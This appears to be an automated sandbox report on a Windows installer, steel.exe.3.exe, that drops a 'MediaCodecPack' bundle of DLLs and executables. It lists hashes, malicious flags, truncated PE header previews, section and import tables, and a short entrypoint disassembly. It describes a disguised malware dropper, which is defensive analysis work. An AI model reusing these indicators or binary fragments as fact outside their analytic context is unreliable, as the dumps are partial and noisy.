                                                                                          SSDEEP:1536:Bkt2SjEQ3r94YqwyadpL1X6Dtn4afF1VowWb8ZmmUQNk3gNqCLbMsFxJse8hbpmn:mR/CYj9dp5XIyI2b/mY3gNjLbMsOaP
                                                                                          MD5:B1B9E6D43319F6D4E52ED858C5726A97
                                                                                          SHA1:5033047A30CCCF57783C600FD76A6D220021B19D
                                                                                          SHA-256:8003A4A0F9F5DFB62BEFBF81F8C05894B0C1F987ACFC8654A6C6CE02B6213910
                                                                                          SHA-512:E56D6EC9170DEBAC28BB514942F794F73D4C194D04C54EFF9227B6EE3C74BA4FCF239FFF0BB6556DC8B847FA89D382AF206A2C481C41A3510936B0A74192D2C2
                                                                                          Malicious:false
                                                                                          Preview:ITSF....`..........E.......|.{.......".....|.{......."..`...............x.......T.......................g1..............ITSP....T...........................................j..].!......."..T...............PMGLW................/..../#IDXHDR...F.../#ITBITS..../#IVB...N$./#STRINGS.....P./#SYSTEM..N.'./#TOPICS...F.0./#URLSTR...:.t./#URLTBL...v.D./$FIftiMain......1./$OBJINST...z.../$WWAssociativeLinks/..../$WWAssociativeLinks/Property...v../$WWKeywordLinks/..../$WWKeywordLinks/Property...r../After.jpg...4..../Auto-.hhc...^./Auto-Adjustment.htm....?./Auto-BleachTeeth.htm...z.3./Auto-Crop2Plus.htm..U.j./Auto-Emphasis.htm...w.V./Auto-EyeColor.htm...!.../Auto-EyePencil.htm..._.../Auto-EyeShadow.htm...,.3./Auto-GettingStarted.htm....Q./Auto-Lipstick.htm..R.M./Auto-Liquify.htm...-.v./Auto-Menu.htm..S.r./Auto-OrderingInformation.htm...Q.../Auto-Overview.htm..^.$./Auto-Powder.htm......./Auto-Resize.htm..s.b./Auto-Rotation.htm..?.e./Auto-Rouge.htm...=.d./Auto-SkinCare.htm...|.{./Auto-SmartPatchCosmet
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp
                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):176128
                                                                                          Entropy (8bit):6.204917493416147
                                                                                          Encrypted:false
                                                                                          SSDEEP:3072:l9iEoC1+7N9UQV2Mi8NTUU3/EO3h3E9y6GeoPRtsoWhi75MUbvSHQ:l+ssU62Mi8x9P/UVGeQRthMUbvS
                                                                                          MD5:FEC4FF0C2967A05543747E8D552CF9DF
                                                                                          SHA1:B4449DC0DF8C0AFCC9F32776384A6F5B5CEDE20C
                                                                                          SHA-256:5374148EBCF4B456F8711516A58C9A007A393CA88F3D9759041F691E4343C7D6
                                                                                          SHA-512:93E3F48CD393314178CBC86F6142D577D5EAAE52B47C4D947DBA4DFB706860B150FF5B0E546CB83114CA44666E9DF6021964D79D064B775A58698DAA9550EF13
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........+0.J^..J^..J^.cE...J^..VR..J^..UU..J^.#VP..J^..UT..J^..UZ..J^..kU..J^..kZ..J^..J_..J^..iT..J^..io..J^.gLX..J^._jZ..J^.Rich.J^.................PE..L.....L...........!.....0...@.......'.......@...................................................................... e..k....X..d....`.......................p..p....................................................@...............................text....".......0.................. ..`.rdata...%...@...0...@..............@..@.data...T....p... ...p..............@....rsrc........`......................@..@.reloc.......p......................@..B........................................................................................................................................................................................................................................................................................
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp
                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                          Category:modified
                                                                                          Size (bytes):3186888
                                                                                          Entropy (8bit):6.230475147166178
                                                                                          Encrypted:false
                                                                                          SSDEEP:49152:5YOSeerrANJi8JBsNkPB4jnCViGF1awdEYO:SVeevAb/2kZ4jGiGFdO
                                                                                          MD5:1BADA3AB49364C26DA68D41031611AC7
                                                                                          SHA1:5BBB3CA5C6CED071A4297E0DB6C8AA96B16FA96B
                                                                                          SHA-256:F8A65D51ACF7D271F7BA0114366234DCE29BE27CFB73CA94AF990EC379350149
                                                                                          SHA-512:CFA982246856746524ECF44D45F5697B52DC6E90A828625697116B856CB7B51080562607EB89910216D18C8C13E2AED2AAAD65C58F66DEE3B6CDB79405C36701
                                                                                          Malicious:true
                                                                                          Yara Hits:
                                                                                          • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe, Author: Joe Security
                                                                                          Antivirus:
                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................PE..L.....bg.................j...D.......#............@...........................1.......1.....................................4........ ..0...............................................................................\............................aitt5...h.......j.................. ..`.ajtt5...-...........n..............@..@.aktt5...d.......0..................@....rsrc........ ......................@..@.altt5...&.......$...|..............`./.........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp
                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):499712
                                                                                          Entropy (8bit):6.414789978441117
                                                                                          Encrypted:false
                                                                                          SSDEEP:12288:fJzxYPVsBnxO/R7krZhUgiW6QR7t5k3Ooc8iHkC2eq:fZxvBnxOJ7ki3Ooc8iHkC2e
                                                                                          MD5:561FA2ABB31DFA8FAB762145F81667C2
                                                                                          SHA1:C8CCB04EEDAC821A13FAE314A2435192860C72B8
                                                                                          SHA-256:DF96156F6A548FD6FE5672918DE5AE4509D3C810A57BFFD2A91DE45A3ED5B23B
                                                                                          SHA-512:7D960AA8E3CCE22D63A6723D7F00C195DE7DE83B877ECA126E339E2D8CC9859E813E05C5C0A5671A75BB717243E9295FD13E5E17D8C6660EB59F5BAEE63A7C43
                                                                                          Malicious:false
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............................................................................Rich...................PE..L.....w>...........!.................-............:|................................~e..............................$...?...d!..<....`.......................p...0..8...8...............................H............................................text............................... ..`.rdata..2*.......0..................@..@.data...h!...0... ...0..............@....rsrc........`.......P..............@..@.reloc...0...p...@...`..............@..B........................................................................................................................................................................................................................................................................................................................
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp
                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):348160
                                                                                          Entropy (8bit):6.542655141037356
                                                                                          Encrypted:false
                                                                                          SSDEEP:6144:OcV9z83OtqxnEYmt3NEnvfF+Tbmbw6An8FMciFMNrb3YgxxpbCAOxO2ElvlE:Ooz83OtIEzW+/m/AyF7bCrO/E
                                                                                          MD5:86F1895AE8C5E8B17D99ECE768A70732
                                                                                          SHA1:D5502A1D00787D68F548DDEEBBDE1ECA5E2B38CA
                                                                                          SHA-256:8094AF5EE310714CAEBCCAEEE7769FFB08048503BA478B879EDFEF5F1A24FEFE
                                                                                          SHA-512:3B7CE2B67056B6E005472B73447D2226677A8CADAE70428873F7EFA5ED11A3B3DBF6B1A42C5B05B1F2B1D8E06FF50DFC6532F043AF8452ED87687EEFBF1791DA
                                                                                          Malicious:false
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........2..S..S..S..Tp..S..S..5S..BX..S..BX...S..BX..Q..BX..S..BX..S..BX..S..Rich.S..........................PE..L.....V>...........!................."............4|.........................`......................................t....C......(.... .......................0..d+..H...8...........................x...H...............l............................text............................... ..`.rdata..@...........................@..@.data... h.......`..................@....rsrc........ ......................@..@.reloc..d+...0...0... ..............@..B........................................................................................................................................................................................................................................................................................................................
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):645592
                                                                                          Entropy (8bit):6.50414583238337
                                                                                          Encrypted:false
                                                                                          SSDEEP:12288:i0zrcH2F3OfwjtWvuFEmhx0Cj37670jwX+E7tFKm0qTYh:iJUOfwh8u9hx0D70NE7tFTYh
                                                                                          MD5:E477A96C8F2B18D6B5C27BDE49C990BF
                                                                                          SHA1:E980C9BF41330D1E5BD04556DB4646A0210F7409
                                                                                          SHA-256:16574F51785B0E2FC29C2C61477EB47BB39F714829999511DC8952B43AB17660
                                                                                          SHA-512:335A86268E7C0E568B1C30981EC644E6CD332E66F96D2551B58A82515316693C1859D87B4F4B7310CF1AC386CEE671580FDD999C3BCB23ACF2C2282C01C8798C
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....=S.v..?......!................X..............`......................... ......8......... .................................L................................'......................................................p............................text...............................`.0`.data...............................@.@..rdata..$...........................@.@@.bss..................................@..edata..............................@.0@.idata..L...........................@.0..CRT................................@.0..tls.... ...........................@.0..reloc...'.......(..................@.0B/4......`....0......................@.@B/19..........@......................@..B/35.....M....P......................@..B/51.....`C...`...D..................@..B/63..................8..............@..B/77..................F..............@..B/89..................R..
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp
                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):717985
                                                                                          Entropy (8bit):6.514903952773555
                                                                                          Encrypted:false
                                                                                          SSDEEP:12288:STPcYn5c/rPx37/zHBA6a5UeYpthr1CERAgrNuR+FIq5MRxyFw:aPcYn5c/rPx37/zHBA6pFptZ1CE8qMR1
                                                                                          MD5:EACFC79F02180D07DE98139B1DD89524
                                                                                          SHA1:600E37A407063B3582FFC73A82BCDCA0928FD79D
                                                                                          SHA-256:D2909621E8EE51030A7EAD10479DD88EDC1B0CA8489C0756A8FD2F5705DB2534
                                                                                          SHA-512:BF30948AC036BBC7EEAC95250789754E85AFD856992FA1AD688B6F2F44D7871BB7C18A255A97AF190606E6184B3010D89F69269019DCBED3311470823994E320
                                                                                          Malicious:true
                                                                                          Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................~........................@..............................................@...............................%..................................................................................................................CODE.....}.......~.................. ..`DATA................................@...BSS......................................idata...%.......&..................@....tls.....................................rdata..............................@..P.reloc....... ......................@..P.rsrc...............................@..P.....................T..............@..P........................................................................................................................................
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp
                                                                                          File Type:InnoSetup Log MediaCodecPack, version 0x30, 4696 bytes, 921702\user, "C:\Users\user\AppData\Local\MediaCodecPack 1.1.22"
                                                                                          Category:dropped
                                                                                          Size (bytes):4696
                                                                                          Entropy (8bit):4.72346145184067
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:VUZ9eJdWs38tpRuk3mq9V+eOIhjza7ICSss/LnZIiEQ63ywcyOymcPB:VUZ96dWs3KpRukW1HIhjcICSsAnZI9Qs
                                                                                          MD5:7F2DE7F9C465DF68154845B6ED9F7AC7
                                                                                          SHA1:0480C10B0DDE42F653C14515F25702288B2947FA
                                                                                          SHA-256:232A466A4D8C1E6E61FBC99DB384BD752D5163029A19679CDA9F299B629C835C
                                                                                          SHA-512:9B1C475D50AA19420519CF8AF4C0EA2ABE112FACF3771F0F20D89ED7529C933DB934151F6FC3629CAC682300A191920DEC72B2CFA6D31941EFC01EC337448451
                                                                                          Malicious:false
                                                                                          Preview:Inno Setup Uninstall Log (b)....................................MediaCodecPack..................................................................................................................MediaCodecPack..................................................................................................................0.......X...%..................................................................................................................Z..........[C......R....921702.user2C:\Users\user\AppData\Local\MediaCodecPack 1.1.22...........,...1.. ............IFPS.............................................................................................................BOOLEAN..............TWIZARDFORM....TWIZARDFORM.........TPASSWORDEDIT....TPASSWORDEDIT...........................................!MAIN....-1..(...dll:kernel32.dll.CreateFileA..............$...dll:kernel32.dll.WriteFile............"...dll:kernel32.dll.CloseHandle........"...dll:kernel32.dll.ExitProcess........%...dll:User
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp
                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):717985
                                                                                          Entropy (8bit):6.514903952773555
                                                                                          Encrypted:false
                                                                                          SSDEEP:12288:STPcYn5c/rPx37/zHBA6a5UeYpthr1CERAgrNuR+FIq5MRxyFw:aPcYn5c/rPx37/zHBA6pFptZ1CE8qMR1
                                                                                          MD5:EACFC79F02180D07DE98139B1DD89524
                                                                                          SHA1:600E37A407063B3582FFC73A82BCDCA0928FD79D
                                                                                          SHA-256:D2909621E8EE51030A7EAD10479DD88EDC1B0CA8489C0756A8FD2F5705DB2534
                                                                                          SHA-512:BF30948AC036BBC7EEAC95250789754E85AFD856992FA1AD688B6F2F44D7871BB7C18A255A97AF190606E6184B3010D89F69269019DCBED3311470823994E320
                                                                                          Malicious:true
                                                                                          Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................~........................@..............................................@...............................%..................................................................................................................CODE.....}.......~.................. ..`DATA................................@...BSS......................................idata...%.......&..................@....tls.....................................rdata..............................@..P.reloc....... ......................@..P.rsrc...............................@..P.....................T..............@..P........................................................................................................................................
                                                                                          Process:C:\Users\user\Desktop\steel.exe.3.exe
                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):706560
                                                                                          Entropy (8bit):6.5063766308210695
                                                                                          Encrypted:false
                                                                                          SSDEEP:12288:aTPcYn5c/rPx37/zHBA6a5UeYpthr1CERAgrNuR+FIq5MRxyF:yPcYn5c/rPx37/zHBA6pFptZ1CE8qMRU
                                                                                          MD5:192CB1EFDC38E560F417C173410B8749
                                                                                          SHA1:95EC6D2B92A9E9EC5EA4F18CA20061B9A5F1354E
                                                                                          SHA-256:EC21B358820D9243942D00CD757973F8C023D2A4964561E612C6DF1B0B32BAD9
                                                                                          SHA-512:356FB46E7346EFA9F62401F36C3F8B3282B3B9580B00434AC72E0B7E364A483695776489829656D0AD18F99521A2127E9C490E7371988FF613E62DF1444A81C5
                                                                                          Malicious:true
                                                                                          Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................~........................@..............................................@...............................%..................................................................................................................CODE.....}.......~.................. ..`DATA................................@...BSS......................................idata...%.......&..................@....tls.....................................rdata..............................@..P.reloc....... ......................@..P.rsrc...............................@..P.....................T..............@..P........................................................................................................................................
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp
                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):2560
                                                                                          Entropy (8bit):2.8818118453929262
                                                                                          Encrypted:false
                                                                                          SSDEEP:24:e1GSgDIX566lIB6SXvVmMPUjvhBrDsqZ:SgDKRlVImgUNBsG
                                                                                          MD5:A69559718AB506675E907FE49DEB71E9
                                                                                          SHA1:BC8F404FFDB1960B50C12FF9413C893B56F2E36F
                                                                                          SHA-256:2F6294F9AA09F59A574B5DCD33BE54E16B39377984F3D5658CDA44950FA0F8FC
                                                                                          SHA-512:E52E0AA7FE3F79E36330C455D944653D449BA05B2F9ABEE0914A0910C3452CFA679A40441F9AC696B3CCF9445CBB85095747E86153402FC362BB30AC08249A63
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........W.c.W.c.W.c...>.T.c.W.b.V.c.R.<.V.c.R.?.V.c.R.9.V.c.RichW.c.........................PE..L....b.@...........!......................... ...............................@......................................p ..}.... ..(............................0....................................................... ...............................text............................... ..`.rdata....... ......................@..@.reloc.......0......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp
                                                                                          File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):6144
                                                                                          Entropy (8bit):4.289297026665552
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:Sv1LfWvPcXegCPUo1vlZQrAxoONfHFZONfH3d1xCWMBFNL2pGSS4k+bkg6j0KHc:wfkcXegaJ/ZAYNzcld1xaX12pfSKvkc
                                                                                          MD5:C8871EFD8AF2CF4D9D42D1FF8FADBF89
                                                                                          SHA1:D0EACD5322C036554D509C7566F0BCC7607209BD
                                                                                          SHA-256:E4FC574A01B272C2D0AED0EC813F6D75212E2A15A5F5C417129DD65D69768F40
                                                                                          SHA-512:2735BB610060F749E26ACD86F2DF2B8A05F2BDD3DCCF3E4B2946EBB21BA0805FB492C474B1EEB2C5B8BF1A421F7C1B8728245F649C644F4A9ECC5BD8770A16F6
                                                                                          Malicious:false
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....HP..........#............................@.............................`..............................................................<!.......P.......@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc........P......................@..@................................................................................................................................................................................................................................................................................................................................
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp
                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):23312
                                                                                          Entropy (8bit):4.596242908851566
                                                                                          Encrypted:false
                                                                                          SSDEEP:384:+Vm08QoKkiWZ76UJuP71W55iWHHoSHigH2euwsHTGHVb+VHHmnH+aHjHqLHxmoq1:2m08QotiCjJuPGw4
                                                                                          MD5:92DC6EF532FBB4A5C3201469A5B5EB63
                                                                                          SHA1:3E89FF837147C16B4E41C30D6C796374E0B8E62C
                                                                                          SHA-256:9884E9D1B4F8A873CCBD81F8AD0AE257776D2348D027D811A56475E028360D87
                                                                                          SHA-512:9908E573921D5DBC3454A1C0A6C969AB8A81CC2E8B5385391D46B1A738FB06A76AA3282E0E58D0D2FFA6F27C85668CD5178E1500B8A39B1BBAE04366AE6A86D3
                                                                                          Malicious:false
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......IzJ^..$...$...$...%.".$.T87...$.[."...$...$...$.Rich..$.........................PE..L.....\;...........#..... ...4.......'.......0.....q....................................................................k...l)..<....@.../...................p..T....................................................................................text...{........ .................. ..`.data...\....0.......&..............@....rsrc..../...@...0...(..............@..@.reloc.......p.......X..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                          Entropy (8bit):7.997553528524186
                                                                                          TrID:
                                                                                          • Win32 Executable (generic) a (10002005/4) 98.73%
                                                                                          • Inno Setup installer (109748/4) 1.08%
                                                                                          • Windows Screen Saver (13104/52) 0.13%
                                                                                          • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                          File name:steel.exe.3.exe
                                                                                          File size:3'295'664 bytes
                                                                                          MD5:db153670ed84a7e848fa356e7aecc80d
                                                                                          SHA1:7c6be83fc3b7af9c5980c6d46a4a604b7c878ebd
                                                                                          SHA256:ba58d3f14d7e106b3ad8d60501bdbcaf19506731b5085d478d9a0887e6b0b524
                                                                                          SHA512:079bacd7beb23aa0e2b8c52ccebc13d65792bd39fb45c8831da4947af10d5d31b99115ddf68163466578d90bfebf8e8892b1e827f263ace569a78af51c610e36
                                                                                          SSDEEP:49152:C9XpqfbcbSvc5ktiyevRogYI28M5Ycv85L60t8IWOrVqmnf3jiJKuNqz:MnbStH8ogYI28S5v8G/OocpYqz
                                                                                          TLSH:43E533604C940DB4D06224B63A31C3BD5BB36C1E882D1957249CFD6BBB168D8EA5BF4F
                                                                                          File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                                                                                          Icon Hash:2d2e3797b32b2b99
                                                                                          Entrypoint:0x40a5f8
                                                                                          Entrypoint Section:CODE
                                                                                          Digitally signed:false
                                                                                          Imagebase:0x400000
                                                                                          Subsystem:windows gui
                                                                                          Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                                                          DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                          Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                                                                          TLS Callbacks:
                                                                                          CLR (.Net) Version:
                                                                                          OS Version Major:1
                                                                                          OS Version Minor:0
                                                                                          File Version Major:1
                                                                                          File Version Minor:0
                                                                                          Subsystem Version Major:1
                                                                                          Subsystem Version Minor:0
                                                                                          Import Hash:884310b1928934402ea6fec1dbd3cf5e
                                                                                          Instruction
                                                                                          push ebp
                                                                                          mov ebp, esp
                                                                                          add esp, FFFFFFC4h
                                                                                          push ebx
                                                                                          push esi
                                                                                          push edi
                                                                                          xor eax, eax
                                                                                          mov dword ptr [ebp-10h], eax
                                                                                          mov dword ptr [ebp-24h], eax
                                                                                          call 00007F9D3CFD2BC3h
                                                                                          call 00007F9D3CFD3DCAh
                                                                                          call 00007F9D3CFD4059h
                                                                                          call 00007F9D3CFD40FCh
                                                                                          call 00007F9D3CFD609Bh
                                                                                          call 00007F9D3CFD8A06h
                                                                                          call 00007F9D3CFD8B6Dh
                                                                                          xor eax, eax
                                                                                          push ebp
                                                                                          push 0040ACC9h
                                                                                          push dword ptr fs:[eax]
                                                                                          mov dword ptr fs:[eax], esp
                                                                                          xor edx, edx
                                                                                          push ebp
                                                                                          push 0040AC92h
                                                                                          push dword ptr fs:[edx]
                                                                                          mov dword ptr fs:[edx], esp
                                                                                          mov eax, dword ptr [0040C014h]
                                                                                          call 00007F9D3CFD961Bh
                                                                                          call 00007F9D3CFD9206h
                                                                                          cmp byte ptr [0040B234h], 00000000h
                                                                                          je 00007F9D3CFDA0FEh
                                                                                          call 00007F9D3CFD9718h
                                                                                          xor eax, eax
                                                                                          call 00007F9D3CFD38B9h
                                                                                          lea edx, dword ptr [ebp-10h]
                                                                                          xor eax, eax
                                                                                          call 00007F9D3CFD66ABh
                                                                                          mov edx, dword ptr [ebp-10h]
                                                                                          mov eax, 0040CE28h
                                                                                          call 00007F9D3CFD2C5Ah
                                                                                          push 00000002h
                                                                                          push 00000000h
                                                                                          push 00000001h
                                                                                          mov ecx, dword ptr [0040CE28h]
                                                                                          mov dl, 01h
                                                                                          mov eax, 0040738Ch
                                                                                          call 00007F9D3CFD6F3Ah
                                                                                          mov dword ptr [0040CE2Ch], eax
                                                                                          xor edx, edx
                                                                                          push ebp
                                                                                          push 0040AC4Ah
                                                                                          push dword ptr fs:[edx]
                                                                                          mov dword ptr fs:[edx], esp
                                                                                          call 00007F9D3CFD9676h
                                                                                          mov dword ptr [0040CE34h], eax
                                                                                          mov eax, dword ptr [0040CE34h]
                                                                                          cmp dword ptr [eax+0Ch], 00000000h
                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0xd0000x950.idata
                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x110000x2c00.rsrc
                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0xf0000x18.rdata
                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                          CODE0x10000x9d300x9e00c3bd95c4b1a8e5199981e0d9b45fd18cFalse0.6052709651898734data6.631765876950794IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                          DATA0xb0000x2500x4001ee71d84f1c77af85f1f5c278f880572False0.306640625data2.751820662285145IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                          BSS0xc0000xe8c0x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                          .idata0xd0000x9500xa00bb5485bf968b970e5ea81292af2acdbaFalse0.414453125data4.430733069799036IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                          .tls0xe0000x80x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                          .rdata0xf0000x180x2009ba824905bf9c7922b6fc87a38b74366False0.052734375data0.2044881574398449IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                                          .reloc0x100000x8c40x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                                          .rsrc0x110000x2c000x2c00fcbf401062477a1819ab7c1055c10accFalse0.3254616477272727data4.4922954803823965IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                          RT_ICON0x113540x128Device independent bitmap graphic, 16 x 32 x 4, image size 192DutchNetherlands0.5675675675675675
                                                                                          RT_ICON0x1147c0x568Device independent bitmap graphic, 16 x 32 x 8, image size 320DutchNetherlands0.4486994219653179
                                                                                          RT_ICON0x119e40x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 640DutchNetherlands0.4637096774193548
                                                                                          RT_ICON0x11ccc0x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1152DutchNetherlands0.3935018050541516
                                                                                          RT_STRING0x125740x2f2data0.35543766578249336
                                                                                          RT_STRING0x128680x30cdata0.3871794871794872
                                                                                          RT_STRING0x12b740x2cedata0.42618384401114207
                                                                                          RT_STRING0x12e440x68data0.75
                                                                                          RT_STRING0x12eac0xb4data0.6277777777777778
                                                                                          RT_STRING0x12f600xaedata0.5344827586206896
                                                                                          RT_RCDATA0x130100x2cdata1.1818181818181819
                                                                                          RT_GROUP_ICON0x1303c0x3edataEnglishUnited States0.8387096774193549
                                                                                          RT_VERSION0x1307c0x4f4dataEnglishUnited States0.2610410094637224
                                                                                          RT_MANIFEST0x135700x5a4XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.42590027700831024
                                                                                          DLLImport
                                                                                          kernel32.dllDeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, WideCharToMultiByte, TlsSetValue, TlsGetValue, MultiByteToWideChar, GetModuleHandleA, GetLastError, GetCommandLineA, WriteFile, SetFilePointer, SetEndOfFile, RtlUnwind, ReadFile, RaiseException, GetStdHandle, GetFileSize, GetSystemTime, GetFileType, ExitProcess, CreateFileA, CloseHandle
                                                                                          user32.dllMessageBoxA
                                                                                          oleaut32.dllVariantChangeTypeEx, VariantCopyInd, VariantClear, SysStringLen, SysAllocStringLen
                                                                                          advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegCloseKey, OpenProcessToken, LookupPrivilegeValueA
